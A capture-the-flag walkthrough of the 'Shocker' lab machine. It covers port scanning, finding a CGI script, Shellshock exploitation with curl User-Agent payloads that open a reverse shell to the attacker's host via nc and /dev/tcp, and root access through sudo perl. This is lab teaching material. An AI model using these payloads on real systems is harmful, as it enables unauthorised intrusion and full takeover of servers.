# Shocker
> # 10.10.10.56

nmap
>PORT     STATE SERVICE VERSION
[80/tcp](portscan.md#80)   open  http    Apache httpd 2.4.18 ((Ubuntu))
[2222/tcp](portscan.md#22) open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 


This is the webpage
![[shocker1.png]]
The name of the machine is "Shocker", there's a web service and the webpage ask us to not bug it, looking on google we can easily understand that we're working with a shellshock webservice
we're working on a shellshock service and probably we have to find some bug:
[Here you go.](https://antonyt.com/blog/2020-03-27/exploiting-cgi-scripts-with-shellshock)

Cool, but what is our entry point?
We know that we have to find some .sh file in the cgi-bin folder and  using dirbuster with the .sh extension we can spot the file 
"/cgi-bin/user.sh"
![[shocker2.png]]

Following the tutorial and using the right curl request as you can see we get a connection
Turn on a listener:
```bash
nc -nvlp 42069
```
Set up a revshell payload:
```bash
curl -H "User-Agent:() { :;}; /bin/bash -c 'nc 10.10.14.16 42069'" 10.10.10.56/cgi-bin/user.sh
```
![[shocker3.png]]
This means that we're actually exploiting it.

Let's correct that payload:
```bash
curl -H "User-Agent:() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/42069 0>&1'" 10.10.10.56/cgi-bin/user.sh
```
![[shocker4.png]]

Enough for user.txt
![[shocker5.png]]

First thing to check for the privilege escalation is what we can do as sudoers:
```bash 
sudo -l
```
![[shocker6.png]]

We can run perl  with root permission, check on GTFObins if they have something:
[GTFOBins - perl](https://gtfobins.github.io/gtfobins/perl/)
```bash
sudo perl -e 'exec "/bin/sh";'
```
And we're root!
![[shocker7.png]]

#machine #sudo #cgi